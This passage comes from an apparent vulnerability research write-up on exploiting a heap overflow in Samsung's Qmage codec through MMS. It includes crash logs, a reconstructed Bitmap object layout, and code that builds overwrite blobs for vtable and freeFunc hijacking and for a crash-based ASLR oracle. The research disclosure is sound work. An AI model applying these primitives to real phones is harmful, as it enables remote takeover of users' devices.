Option 2: A temporary output storage buffer, which is the #3 malloc made by the harness after parsing the headers (preceded only by the bitmap object allocation), and the first allocation in the getAndroidPixels call
  • Example crash ID: b0749f475f0b7af444625c3d1c3a5be8
  • Size: Controlled through the bitmap dimensions
  • Allocated in: QuramQmageDecodeFrame_Rev14474_20150224
  • Overflown by: QuramQumageDecoder8bit, QuramQmageGrayIndexRleDecode
  • Potential corruption targets: The decoding context structure of size 1688 allocated at the beginning of QuramQumageDecoder8bit, as well as any of the numerous other allocations in that function; the RLE decoding context structure of size 4120 allocated in QuramQmageGrayIndexRleDecode

Option 3: A temporary RLE decoding buffer
  • Example crash ID: 03f2d8074d5797537e8c615b2fa53cef
  • Size: Controlled 32-bit integer from the input stream
  • Allocated in: QmageDecodeStreamGet, QmageDecodeStreamGet_Rev11454_141008, QmageRleDecode
  • Overflown by: QmageDecodeStreamGet, QmageDecodeStreamGet_Rev11454_141008, QmageRleDecode
  • Potential corruption targets: The RLE decoding context structure of size 4120

Option 4: A temporary zlib decoding buffer
  • Example crash ID: cbd3dbc9e71b2fec9606eaa3eafce056
  • Size: Controlled through the bitmap dimensions
  • Allocated in: QuramQumageDecoder32bit24bit
  • Overflown by: qme_inflate (as called by QuramQumageDecoder32bit24bit → DecodePrediction2dZip → PVcodecDecoder_zip → qme_uncompress)
  • Potential corruption targets: The zlib decoding context structure of size 12928

After some consideration, I decided that option 1 (bitmap pixel buffer) was the most promising one, because:

  • It was the earliest overflown malloc, making it possible to corrupt the widest range of subsequently allocated objects, including the Bitmap object.
  • The size was controlled, and in the case of RLE and zlib decompression, the overflow length and data were controlled too. On top of it, I was familiar with both algorithms and thus didn't anticipate any problems constructing the exploit files.

To be specific, I started my experimentation with the e418c0496cb1babf0eba13026f4d1504 crash and the signal_sigsegv_4005d89b74_8686_6eea0420198397cc5c97563bceb04424.qmg sample. It generated the following report (malloc stack traces again edited out):

[...]
[+] Detected image characteristics:
[+] Dimensions:      40 x 7
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
malloc(      1120) = {0x408c13bba0 .. 0x408c13c000}
malloc(       104) = {0x408c13df98 .. 0x408c13e000}
malloc(        24) = {0x408c13ffe8 .. 0x408c140000}
malloc(      4120) = {0x408c141fe8 .. 0x408c143000}
ASAN:SIGSEGV
=================================================================
==3746114==ERROR: AddressSanitizer: SEGV on unknown address 0x408c13c000 (pc 0x40071feb74 sp 0x4000d0b1f0 bp 0x4000d0b1f0 T0)
    #0 0x00249b74 in libhwui.so (QuramQmageGrayIndexRleDecode+0xd8)
    #1 0x002309d8 in libhwui.so (PVcodecDecoderIndex+0x110)
    #2 0x00230854 in libhwui.so (__QM_WCodec_decode+0xe4)
    #3 0x00230544 in libhwui.so (Qmage_WDecodeFrame_Low+0x198)
    #4 0x0022c604 in libhwui.so (QuramQmageDecodeFrame+0x78)
[...]

Here, we are overflowing the 1120-byte buffer (width × height × bpp; 40 × 7 × 4 = 1120), and can corrupt the three subsequent ones marked in red. The first (104 bytes) is the Bitmap structure, the second (24 bytes) is the RLE-compressed input stream, and the third (4120 bytes) is the RLE decoder context structure. The Bitmap object sounds the most useful, and since I have already mentioned it so many times, let's finally look into it to see how it works! We'll be operating on the assumption that if we adjust the Qmage dimensions such that the pixel buffer consumes 104 bytes (e.g. 13x2), then the two allocations will likely be adjacent on Android, giving us full (linear) control over the second region.

Enter the Android Bitmap object

First of all, it is important to note that the Bitmap object created by our test harness is not exactly the same as the one used in Android, because of a difference in the allocator objects used (SkBitmap::HeapAllocator vs GraphicsJNI's HeapAllocator). This is irrelevant for fuzzing, but makes a big difference in exploit development. In order to learn about the actual object being allocated on Android, we can use a simple Frida script that hooks the heap-related functions and logs all of their invocations together with stack traces. If we attach it to the com.samsung.android.messaging process and send an MMS with the proof-of-concept image, we should see output similar to the following (I demangled some symbols and edited out argument definitions for brevity):

[10036] calloc(1120, 1) => 0x7bc1e95900
    0x7cbba83684 libhwui.so!android::Bitmap::allocateHeapBitmap+0x34
    0x7cbba88b54 libhwui.so!android::Bitmap::allocateHeapBitmap+0x9c
    0x7cbd827178 libandroid_runtime.so!HeapAllocator::allocPixelRef+0x28
    0x7cbbd1ae80 libhwui.so!SkBitmap::tryAllocPixels+0x50
    0x7cbd820ae8 libandroid_runtime.so!0x187ae8
    0x7cbd81fc8c libandroid_runtime.so!0x186c8c
    0x70a04ff0 boot-framework.oat!0x2bbff0
[10036] malloc(160) => 0x7b8cd569e0
    0x7cbddd35c4 libc++.so!operator new+0x24
    0x7cbe67e608
[10036] malloc(24) => 0x7b8ca92580
    0x7cbb87baf4 libhwui.so!QuramQmageGrayIndexRleDecode+0x58
    0x7cbe67e608
[10036] calloc(1, 4120) => 0x7bc202c000
    0x7cbb89fb14 libhwui.so!init_process_run_dec+0x20
    0x7cbb87bb34 libhwui.so!QuramQmageGrayIndexRleDecode+0x98
    0x7cbb8629d4 libhwui.so!PVcodecDecoderIndex+0x10c
    0x7cbb862850 libhwui.so!__QM_WCodec_decode+0xe0
    0x7cbb862540 libhwui.so!Qmage_WDecodeFrame_Low+0x194
    0x7cbb85e600 libhwui.so!QuramQmageDecodeFrame+0x74
[...]

Here, we can again see the familiar highlighted allocations before the overflow occurs. The only difference is the size of the Bitmap object: it's 104 in our loader but 160 on Android. Unfortunately Frida didn't correctly unwind the stack for the malloc call, but based on the pixel buffer stack trace, we can figure out that it takes place in android::Bitmap::allocateHeapBitmap:

116:  sk_sp<Bitmap> Bitmap::allocateHeapBitmap(size_t size, const SkImageInfo& info, size_t rowBytes) {
117:      void* addr = calloc(size, 1);
118:      if (!addr) {
119:          return nullptr;
120:      }
121:      return sk_sp<Bitmap>(new Bitmap(addr, size, info, rowBytes));
122:  }

As expected, there is a calloc call for allocating pixel storage, followed by the creation of the Bitmap object itself. This is how the function prologue looks in Hex-Rays:

Decompiled prologue of the allocateHeapBitmap method

If we quickly change the Qmage file dimensions to 10x4, such that the pixel buffer becomes 160 (or any length between 129 and 160, which is the relevant jemalloc bin size), then we can use Frida to verify that the two Bitmap-related allocations are indeed adjacent:

[15699] calloc(160, 1) => 0x7b88feb8c0
    0x7cbba83684 libhwui.so!android::Bitmap::allocateHeapBitmap+0x34
    0x7cbba88b54 libhwui.so!android::Bitmap::allocateHeapBitmap+0x9c
    0x7cbd827178 libandroid_runtime.so!HeapAllocator::allocPixelRef+0x28
    0x7cbbd1ae80 libhwui.so!SkBitmap::tryAllocPixels+0x50
    0x7cbd820ae8 libandroid_runtime.so!0x187ae8
    0x7cbd81fc8c libandroid_runtime.so!0x186c8c
    0x70a04ff0 boot-framework.oat!0x2bbff0
[15699] malloc(160) => 0x7b88feb960
    0x7cbddd35c4 libc++.so!operator new+0x24
    0x7cbe582608

The difference between 0x7b88feb8c0 and 0x7b88feb960 is 160 (0xA0), exactly the size of the first chunk, which means that we should be able to precisely overwrite the succeeding android::Bitmap object. This behavior is not 100% reliable and is hugely dependent on the preexisting heap state of the attacked app, but I found that it was reliable enough to enable successful, practical attacks. I will expand more on this in the next blog post in the series.
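
As a sanity check on the sizing arithmetic, the snippet below enumerates candidate bitmap dimensions. It is a hypothetical helper of my own (not part of the codec or the test harness), and the 129-160 byte range is simply the jemalloc size class mentioned above:

#include <cstdio>

// Hypothetical helper: list bitmap dimensions whose pixel buffer
// (width * height * 4 bytes) falls into the 129-160 byte jemalloc size
// class, i.e. the same class as the 160-byte android::Bitmap object,
// which is what makes adjacent placement likely.
int main() {
  const int kBinLow = 129, kBinHigh = 160;
  for (int w = 1; w <= 40; w++) {
    for (int h = 1; h <= w; h++) {
      int size = w * h * 4;
      if (size >= kBinLow && size <= kBinHigh)
        std::printf("%dx%d -> %d bytes\n", w, h, size);
    }
  }
  return 0;
}

The 10x4 dimensions used above are one of the hits (10 × 4 × 4 = 160 bytes).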

It's finally time to look at the android::Bitmap layout in memory. Currently, the class is defined in frameworks/base/libs/hwui/hwui/Bitmap.h in the Android source tree. Some of its private fields are visible there, but their volume surely doesn't sum up to 160 bytes. This is because the code makes heavy use of C++ inheritance, so android::Bitmap inherits from SkPixelRef, which inherits from SkRefCnt, which in turn inherits from SkRefCntBase. After untangling the above chain of classes and figuring out the alignment requirements for each field, I arrived at the following layout:

struct android::Bitmap {

  /* +0x00 */ void *vtable;

  //
  // class SK_API SkRefCntBase
  //

  /* +0x08 */ mutable std::atomic<int32_t> fRefCnt;

  //
  // class SK_API SkPixelRef : public SkRefCnt
  //

  /* +0x0C */ int     fWidth;
  /* +0x10 */ int     fHeight;
  /* +0x18 */ void*   fPixels;
  /* +0x20 */ size_t  fRowBytes;

  /* +0x28 */ mutable std::atomic<uint32_t> fTaggedGenID;

  struct /* SkIDChangeListener::List */ {
  /* +0x30 */ std::atomic<int> fCount;
  /* +0x34 */ SkOnce           fOSSemaphoreOnce;
  /* +0x38 */ OSSemaphore*     fOSSemaphore;
  } fGenIDChangeListeners;

  struct /* SkTDArray<SkIDChangeListener*> */ {
  /* +0x40 */ SkIDChangeListener* fArray;
  /* +0x48 */ int                 fReserve;
  /* +0x4C */ int                 fCount;
  } fListeners;

  /* +0x50 */ std::atomic<bool> fAddedToCache;

  /* +0x51 */ enum Mutability {
  /* +0x51 */   kMutable,
  /* +0x51 */   kTemporarilyImmutable,
  /* +0x51 */   kImmutable,
  /* +0x51 */ } fMutability : 8;

  //
  // class ANDROID_API Bitmap : public SkPixelRef
  //

  struct /* SkImageInfo */ {
  /* +0x58 */ sk_sp<SkColorSpace> fColorSpace;
  /* +0x60 */ int fWidth;
  /* +0x64 */ int fHeight;
  /* +0x68 */ SkColorType fColorType;
  /* +0x6C */ SkAlphaType fAlphaType;
  } mInfo;

  /* +0x70 */ const PixelStorageType mPixelStorageType;
  /* +0x74 */ BitmapPalette mPalette;
  /* +0x78 */ uint32_t mPaletteGenerationId;
  /* +0x7C */ bool mHasHardwareMipMap;

  union {
    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ void* context;
  /* +0x90 */ FreeFunc freeFunc;
    } external;

    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ int fd;
  /* +0x90 */ size_t size;
    } ashmem;

    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ size_t size;
    } heap;

    struct {
  /* +0x80 */ GraphicBuffer* buffer;
    } hardware;
  } mPixelStorage;

  /* +0x98 */ sk_sp<SkImage> mImage;
};

We can immediately spot a number of interesting fields such as the vtable, pointer to backing pixel storage, bitmap dimensions, a raw function pointer (freeFunc), and pointers to other C++ objects such as SkColorSpace, GraphicBuffer and SkImage. The class clearly has the potential to supply many useful exploitation primitives. Let's go ahead and test some initial ideas to see how the code behaves in contact with a corrupted Bitmap object.

Building code execution primitives

In order to start experimenting with the heap corruption, we have to construct a test case that will be easy to adjust for different tests. For building editable binary files for testing file format parsers, I usually use nasm. It allows me to write code-like .asm source files that specify the values of respective header fields with the db/dw/dd/… pseudo-instructions, may include comments, and can be quickly "compiled" to raw binary form. This is what I also used here, to craft the proof-of-concept Qmage file from scratch, based on the signal_sigsegv_4005d89b74_8686_6eea0420198397cc5c97563bceb04424.qmg sample and reverse engineering the codec in libhwui.so. This is where the debug symbols from old builds of libQmageDecoder.so I dug up earlier in the recon phase (as discussed in Part 1) proved very useful.

The nasm source code of the Qmage file I used for experimentation can be found here. It consists of the following logical parts:

  • File header specifying a QG1.2 format version (equivalent to 2.0, as explained in Part 2) and 4x10 bitmap dimensions.
  • A zlib-compressed color table with all 0x41's.
  • A required \xFF\x00 marker, followed by the 0x06 RLE compression type.
  • A RLE-compressed stream of 161-320 bytes: the first 160 to fill out the pixel buffer, followed by 1-160 bytes depending on what portion of the android::Bitmap object we intend to overwrite.
  • A trailing \xFF\x00 marker.

Notably, the RLE compression used in Qmage is not the simple one we know from BMP files. Based on the structure of the code and some RLE-related symbols (init_process_run, process_run, init_process_run_dec, process_run_dec), we can deduce that it is probably a MELCODE scheme. For our purposes, though, it's not much more complicated. If we intend to take a data blob and wrap it with the RLE structure while actually not reducing its size (similar to how zlib compression level 0 works), it's a matter of adding a simple prefix and suffix. For example, a compressed 8-byte string "ABCDEFGH" takes the following form:

00000000: 0e 00 00 00 08 00 00 00 41 42 43 44 45 46 47 48  ........ABCDEFGH
00000010: aa aa                                            ..

The little-endian 0x0000000E value indicates the length of the rest of the compressed stream (it excludes the length field itself), 0x00000008 specifies the number of runs – in this case, the length of the decompressed data – then comes the raw data, and finally N÷4 bytes of 0xAA, each of which encodes four one-byte runs.
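
Wrapping a payload in this framing takes only a few lines. Below is a minimal sketch (a hypothetical helper of mine, not code from the codec) that follows the layout described above; it assumes the payload length is a multiple of four, which holds for the payloads used in this post:

#include <cstdint>
#include <vector>

// Hypothetical helper: wrap raw bytes in the "stored" RLE framing described
// above - a length word (excluding itself), a run count equal to the
// decompressed size, the raw data, and one 0xAA byte per four one-byte runs.
// Assumes data.size() is a multiple of 4.
std::vector<uint8_t> WrapRle(const std::vector<uint8_t>& data) {
  const uint32_t runs = static_cast<uint32_t>(data.size());
  const uint32_t trailer = runs / 4;
  const uint32_t stream_len = 4 + runs + trailer;

  std::vector<uint8_t> out;
  auto put_u32 = [&out](uint32_t v) {  // little-endian
    for (int i = 0; i < 4; i++) out.push_back(static_cast<uint8_t>(v >> (8 * i)));
  };
  put_u32(stream_len);
  put_u32(runs);
  out.insert(out.end(), data.begin(), data.end());
  out.insert(out.end(), trailer, 0xAA);
  return out;
}

For the 8-byte string "ABCDEFGH", this produces exactly the bytes shown in the hexdump above. With that out of the way, we can proceed to testing potential code execution primitives.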

The first idea is to overwrite the vtable pointer and see if/where the code crashes. Since it's the first field in memory, we only have to write 8 bytes past the end of the pixel buffer. If we set them to AAAAAAAA and send such a file via MMS, we should see the following crash:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414151 in tid 24642 (ReferenceQueueD), pid 24624 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]
pid: 24624, tid: 24642, name: ReferenceQueueD  >>> com.samsung.android.messaging <<<
uid: 10128
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414151
    x0  0000007c2ac85e40  x1  0000007c25ae9724
    x2  0000007cbd81f1b8  x3  0000007c2ad2d9c0
    x4  000000006f2693ac  x5  0000007c25ae96e4
    x6  0000000000000001  x7  0000000000000000
    x8  4141414141414141  x9  0000000000000000
    x10 0000000000000000  x11 0000007c3a3f4000
    x12 0000000000360168  x13 0000000000004000
    x14 0000000000000004  x15 0000000000000000
    x16 0000007c25ae9710  x17 0000000000000bc3
    x18 0000007bd31ee000  x19 0000007c2ad2d9c0
    x20 0000007c3034ff80  x21 0000000013126208
    x22 0000000013126208  x23 00000000131261a0
    x24 000000006f26bb50  x25 00000000131261e0
    x26 0000007cc0350cb0  x27 0000007c3a3f5000
    x28 0000007c25aea020  x29 0000007c25ae9700
    sp  0000007c25ae96f0  lr  00000000705bdc44
    pc  0000007cbd81f210

backtrace:
      #00 pc 0000000000186210  /system/lib64/libandroid_runtime.so (Bitmap_destruct(android::BitmapWrapper*)+88) (BuildId: 21b5827e07da22480245498fa91e171d)
[...]

There is an access to the controlled 0x4141414141414141 address in Bitmap_destruct. The code accessing the pointer is as follows:

.text:0000000000186210                 LDR             X8, [X8,#0x10]
.text:0000000000186214                 BLR             X8

As expected, we get an arbitrary vtable call. It is a great first primitive to confirm, and it is direct evidence that everything seems to be working according to plan. Of course at this point, we don't know where any code is located (to redirect execution there), or even where our controlled data is situated (to set up our fake vtable). However, let's focus on one thing at a time. What's important is that the vtable call is gated by the value of the adjacent fRefCnt field, so we may choose whether or not to trigger it by setting the reference counter to a small or large integer.

The second eye-catching field that can be likely abused to hijack code execution is the freeFunc function pointer in the mPixelStorage union:

    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ void* context;
  /* +0x90 */ FreeFunc freeFunc;
    } external;

We can check where the pointer is used by running a quick cs.android.com search. As it turns out, it is called in the Bitmap::~Bitmap destructor:

236:       case PixelStorageType::External:
237:            mPixelStorage.external.freeFunc(mPixelStorage.external.address,
238:                                            mPixelStorage.external.context);
239:            break;

If we look at the broader context of the code, the destructor may provide the attacker with an assortment of primitives, depending on the value of the mPixelStorageType enum: arbitrary munmap+close, arbitrary free, and another arbitrary vtable call (through the mPixelStorage.hardware.buffer pointer). However, I find the freeFunc pointer the most useful, especially in a potential one-shot scenario where we try to take over control of the app with a single, specially crafted MMS message. Conveniently, the function also takes two arguments, which we may control – or in fact, must control, because reaching the freeFunc field with a linear overflow is only possible after overwriting both address and context.

The only problem with this technique is that the Bitmap destructor itself is called through the vtable at offset 0, the one that we have to corrupt in order to get to the deeper fields in the class. Therefore, we can only use it in our exploit if we leave the vtable pointer intact after the overflow. This, in turn, requires the knowledge of the libhwui.so base address. At this point in the story, we don't know how we could leak such information yet, but exploitation gadgets like this are worth writing down even if we don't have all the pieces of the puzzle to make use of them yet.

To make sure that we're reading the code right, we should confirm the behavior in practice. We can construct a Qmage sample that overwrites the full 160 bytes of the Bitmap object with a marker 0x41 byte, and then fine-tune a few specific fields for the experiment, as sketched in the snippet after this list:

  • vtable set to its original value, in my case 0x7cbbdfc4e0 (0x7cbb632000 base address + 0x7ca4e0 offset)
  • fRefCnt set to 1
  • mPixelStorageType set to 0 (External)
  • mPixelStorage.external.address set to 0xaaaa...aaa.
  • mPixelStorage.external.context set to 0xbbbb...bbb.
  • mPixelStorage.external.freeFunc set to 0xcccc...ccc.
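
For reference, the resulting 160-byte overwrite region could be assembled as shown below. This is a hypothetical helper of my own (in the actual exploit the bytes are emitted by the nasm source), the offsets follow the layout reconstructed earlier, and the vtable value is the one observed on my test device:

#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical builder for the 160 bytes that overwrite the android::Bitmap
// object in this experiment. Everything not explicitly set keeps the 0x41
// marker filler.
std::vector<uint8_t> BuildBitmapOverwrite() {
  std::vector<uint8_t> blob(160, 0x41);
  auto put_u64 = [&blob](size_t off, uint64_t v) { std::memcpy(&blob[off], &v, 8); };
  auto put_u32 = [&blob](size_t off, uint32_t v) { std::memcpy(&blob[off], &v, 4); };

  put_u64(0x00, 0x7cbbdfc4e0ULL);        // vtable: original value (base + 0x7ca4e0)
  put_u32(0x08, 1);                      // fRefCnt
  put_u32(0x70, 0);                      // mPixelStorageType = External
  put_u64(0x80, 0xaaaaaaaaaaaaaaaaULL);  // mPixelStorage.external.address
  put_u64(0x88, 0xbbbbbbbbbbbbbbbbULL);  // mPixelStorage.external.context
  put_u64(0x90, 0xccccccccccccccccULL);  // mPixelStorage.external.freeFunc
  return blob;
}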

If we send it via MMS, we should see the following crash in logcat:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc in tid 13700 (pool-5-thread-1), pid 12954 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]
pid: 12954, tid: 13700, name: pool-5-thread-1  >>> com.samsung.android.messaging <<<
uid: 10128
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc
    x0  aaaaaaaaaaaaaaaa  x1  bbbbbbbbbbbbbbbb
    x2  0000000000000001  x3  0000000000000000
    x4  0000007c2be315d0  x5  0000007c3910cc64
    x6  0000000000000000  x7  00000000186f2b72
    x8  cccccccccccccccc  x9  0000007cbbdfc4f0
    x10 0000000000000000  x11 0000007c3a3f4000
    x12 0000007c3175b20c  x13 000000005f0cc80f
    x14 003419f64036d144  x15 000051761dd7a34a
    x16 0000007cbd8f3230  x17 0000007cbba98620
    x18 0000007bbc84e000  x19 0000007bc8ff8dc0
    x20 0000000000000000  x21 0000007bc9153540
    x22 000000000000000c  x23 0000000000000000
    x24 0000000000000000  x25 0000000000000002
    x26 0000007c2be32d50  x27 0000000000000059
    x28 0000007cc03fa7c0  x29 0000007c2be319c0
    sp  0000007c2be319b0  lr  0000007cbba69f00
    pc  cccccccccccccccc

backtrace:
      #00 pc cccccccccccccccc  <unknown>
      #01 pc 0000000000437efc  /system/lib64/libhwui.so (android::Bitmap::~Bitmap()+252) (BuildId: fcab350692b134df9e8756643e9b06a0)
[...]

As the crash report shows, we control the instruction pointer (PC) and two 64-bit arguments (registers X0 and X1).

In summary, we have two powerful primitives for hijacking the control flow at our disposal – an indirect one through a corrupted vtable pointer, and a direct one through the freeFunc function pointer (with knowledge of the libhwui.so location). This brings us much closer to the ultimate goal of executing arbitrary code. The biggest unsolved problem is now ASLR – since the locations of all important memory regions (stack, heap, shared objects) are randomized, we are completely in the dark as to where we could redirect any kind of pointer. It is time to see if the android::Bitmap object has anything to offer in terms of leaking address space information or otherwise defeating ASLR.

Building an ASLR oracle primitive

In most publicly documented exploitation scenarios, ASLR is bypassed in a highly interactive environment, where the communication between the exploit and the attacked software goes both ways. Examples include JavaScript exploits vs. web browser engines, user-mode exploits vs. OS kernels, and remote exploits vs. network daemons. In all these cases, the leaked address of some object in memory is typically received by the exploit in full, and the "ASLR bypass" problem boils down to enticing the target to transmit the address to the client as part of a standard data exchange.

The circumstances are largely different for exploits delivered via MMS. Here, all communications are realized through one or more mobile network operators, and it is (mostly) a one way protocol. As a result, a remote attacker gets very little visibility into what happens on the victim's phone, let alone being able to disclose some complex information such as a 64-bit address in one go. Notably, the same problem was already encountered by Samuel Groß when exploiting an iPhone iMessage CVE-2019-8641 vulnerability in 2019. In his research, Samuel managed to work around it by making use of message delivery receipts. Depending on how they are implemented, they may be abused to construct a rudimentary 1-bit communication channel going back to the attacker, potentially carrying some kind of address-related information. In case of iMessage, it conveyed the output of an ASLR oracle, indicating if a given absolute address was mapped in memory and had some specific properties. I highly recommend reading the relevant "Remote iPhone Exploitation Part 2: Bringing Light into the Darkness – a Remote ASLR Bypass" post on the Project Zero blog.

The mechanics of the MMS protocol will be discussed in detail in the next post, but for the sake of the storyline I will reveal that MMS also supports delivery receipts. What's more, some SMS/MMS apps such as Samsung Messages do allow the disclosure of information on whether or not the process crashed while processing the incoming message. In turn, this opens up the opportunity to leak partial information about the address space, if we can tie the crash/no crash outcome to the process memory layout. That's where the corrupted Bitmap object comes into play again.

The most basic idea for how to achieve that is by overwriting a pointer with an absolute address whose readability (or writability) we intend to test. In theory, if the address is unmapped, the access will crash, and if it is mapped, the read or write will succeed and the app will stay alive. In practice, things are not so simple, because the process may also crash while operating on the data read from the tested address. So for example, the vtable pointer is not a great candidate for an ASLR oracle, because keeping the process alive would not only require it to point to a readable region, but it would also need to contain the address of a function semi-compatible with the original destructor. Such an oracle would realistically hardly ever return true, which makes it of little use to us.

Luckily, the Bitmap object also contains a few other pointers we can try to target. To start off, we can overwrite its whole area with all 0x41's and see how the process crashes, to determine which pointers are accessed, where, and how. The experiment should yield the following result:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414189 in tid 11604 (pool-5-thread-1), pid 10524 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]

backtrace:
      #00 pc 000000000047a760  /system/lib64/libhwui.so (SkColorSpace::toXYZD50(skcms_Matrix3x3*) const+8)
      #01 pc 000000000018df90  /system/lib64/libandroid_runtime.so (GraphicsJNI::getColorSpace(_JNIEnv*, SkColorSpace*, SkColorType)+280)
      #02 pc 00000000002b5788  /system/framework/arm64/boot-framework.oat (art_jni_trampoline+152)
      #03 pc 00000000005818bc  /system/framework/arm64/boot-framework.oat (android.graphics.Bitmap.getColorSpace+76)
      #04 pc 000000000057faf0  /system/framework/arm64/boot-framework.oat (android.graphics.Bitmap.createBitmap+880)
      #05 pc 00000000005804f4  /system/framework/arm64/boot-framework.oat (android.graphics.Bitmap.createScaledBitmap+372)

The stack trace indicates that the crash occurs while accessing the color space, which is represented by the mInfo.fColorSpace pointer. It might be promising for an oracle, but let's see what happens if it's set to an address of readable memory containing only zeros:

Fatal signal 6 (SIGABRT), code -1 (SI_QUEUE) in tid 12666 (pool-5-thread-1), pid 12550 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]
pid: 12550, tid: 12666, name: pool-5-thread-1  >>> com.samsung.android.messaging <<<
uid: 10128
signal 6 (SIGABRT), code -1 (SI_QUEUE), fault addr --------
Abort message: 'No pending exception expected: java.lang.IllegalArgumentException: Parameter a or g is zero, the transfer function is constant
  at void android.graphics.ColorSpace$Rgb$TransferParameters.<init>(double, double, double, double, double, double, double) (ColorSpace.java:2264)
  at android.graphics.ColorSpace android.graphics.Bitmap.nativeComputeColorSpace(long) (Bitmap.java:-2)
  at android.graphics.ColorSpace android.graphics.Bitmap.getColorSpace() (Bitmap.java:2091)

Unfortunately, the app crashes again, this time due to a failed color space sanity check performed by the TransferParameters method. This means that that pointer is not the perfect gadget for us either, because zeros in memory are exceedingly common, and it would be preferable to distinguish unmapped memory from mapped zero'ed memory in the ASLR oracle output.

The advantage of the last crash report is that it gives us a very clean Java call stack, indicating exactly where the bitmap-related operations occur. It is shown below in full, up until the Messages app method that loads the bitmap delivered in MMS:

android.graphics.ColorSpace$Rgb$TransferParameters.<init>
android.graphics.Bitmap.nativeComputeColorSpace
android.graphics.Bitmap.getColorSpace
android.graphics.Bitmap.createBitmap
android.graphics.Bitmap.createScaledBitmap
com.samsung.android.messaging.common.util.ImageUtil.scaleToHeight
com.samsung.android.messaging.common.util.ImageUtil.scaleToWidth
com.samsung.android.messaging.common.util.ImageUtil.loadBitmapFromStream
com.samsung.android.messaging.common.util.ImageUtil.loadBitmap
com.samsung.android.messaging.common.util.ImageUtil.loadBitmap
com.samsung.android.messaging.ui.model.l.at.a
[...]

We can see that Samsung has a helper ImageUtil class for working with bitmaps, and that unfortunately some symbols in the app are obfuscated (i.e. the ui.model.l.at.a method name). Since the Messages app is not open source, we have to decompile it in order to examine the relevant code. The APK can be found in the /system/priv-app/SamsungMessages_11/SamsungMessages_11.apk file, and my decompiler of choice is jadx.

Lifetime of a Bitmap

When we dig into the Java code, it becomes evident that the lifetime of the Bitmap object is somewhat complex, and it may be subjected to a few transformations. Let's take it step by step:

  1. The initial Bitmap is created through a BitmapFactory.decodeStream call in ImageUtil.loadBitmapFromStream:

    Initial BitmapFactory.decodeStream call

  2. The bitmap is then subjected to scaling:

    Scaling the bitmap to width

  3. The scaling is in fact optional, and only happens if the bitmap dimensions are greater than the intended ones:

    Decompiled scaleToWidth function

  4. Lastly, in the com.samsung.android.messaging.ui.model.l.at.a method, if the bitmap configuration is not ARGB_8888, it is converted to such encoding:

    Loading and converting the bitmap in Samsung Messages code

In a nutshell, step 1 is where the bitmap is allocated, decoded, and overflown, and steps 2 and 3 are where the corrupted object is used, and where we should look for the desired ASLR oracle primitive.

I spent quite some time looking at the image-related Skia code and experimenting with various values of the Bitmap fields. Eventually, I discovered a perfect technique for probing arbitrary addresses to check if they are readable. The primitive is located in step 3 (bitmap conversion to ARGB_8888), so the first order of business is to disable the scaling in step 2. Assuming that we're starting off with a blob of 160 bytes 0x41 again, we should adjust:

  • fWidth (offset 0x0c) → 0x1
  • fHeight (offset 0x10) → 0x1

While we're at it, it will make our life easier later if we make the second set of dimensions sane too:

  • mInfo.fWidth (offset 0x60) → 0x1
  • mInfo.fHeight (offset 0x64) → 0x1

Then, we need to make sure that we pass the rowBytes checks (1, 2) in SkBitmap::setInfo by setting it to a sensible value:

  • fRowBytes (offset 0x20) → 0x1000

If mInfo.fColorSpace is non-NULL, it will be dereferenced, so we have to zero it out:

  • mInfo.fColorSpace (offset 0x58) → 0x0

This gets us past the copying/sanity checking of the basic properties of the bitmap, and into the pixel copying logic under android.graphics.Bitmap.copy → Bitmap_copy → bitmapCopyTo → SkPixmap::readPixels → SkConvertPixels → swizzle_or_premul. To be able to use the swizzle_or_premul conversion routine, the color type needs to be either RGBA_8888 (4) or BGRA_8888 (6), and since it cannot be the former due to the Bitmap.Config check in Java code, there is only one option left:

  • mInfo.fColorType (offset 0x68) → 0x6

Finally, we arrive at the following loop:

62:    for (int y = 0; y < dstInfo.height(); y++) {
63:        SkOpts::RGBA_to_BGRA((uint32_t*)dstPixels, (const uint32_t*)srcPixels, dstInfo.width());
64:        dstPixels = SkTAddOffset<void>(dstPixels, dstRB);
65:        srcPixels = SkTAddOffset<const void>(srcPixels, srcRB);
66:    }

That's where the BGRA to RGBA conversion takes place. In the above snippet, the values of most variables originate from the overwritten android::Bitmap object:

  • dstInfo.height() == mInfo.height
  • dstInfo.width() == mInfo.width
  • srcPixels == fPixels
  • srcRB == fRowBytes

So in other words, for each row of the bitmap, the code copies width×4 bytes from a controlled pointer, and moves the pointer by fRowBytes. This is also illustrated below:


This conversion logic gives us enormous flexibility in terms of the addresses we can trigger accesses to, and importantly, the data being read is just pixel colors, which are completely neutral to the control flow of the code. In the most basic scenario, we can leave the current state of the corrupted fields and make just two more changes:

  • fPixels (offset 0x18) → start of the probed address range
  • mInfo.fHeight (offset 0x64) → number of pages to probe

This will cause Skia to read four bytes in 0x1000 byte intervals, in mInfo.fHeight iterations, starting from the fPixels address. It is equivalent to probing the readability of an arbitrary continuous memory area – if all pages are mapped and readable, the loop will complete successfully and the app will stay alive; otherwise, it will crash while trying to access the first non-readable page in the tested range.
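
Putting the field adjustments together, the oracle variant of the overwrite blob could be assembled as follows. Again, this is a hypothetical helper of mine rather than the actual nasm-built sample; only the fields named above are set, and the offsets are the ones from the layout reconstructed earlier:

#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical builder for the ASLR-oracle variant of the Bitmap overwrite.
// Fields not listed keep the 0x41 filler bytes.
std::vector<uint8_t> BuildOracleOverwrite(uint64_t probe_start, uint32_t pages) {
  std::vector<uint8_t> blob(160, 0x41);
  auto put_u64 = [&blob](size_t off, uint64_t v) { std::memcpy(&blob[off], &v, 8); };
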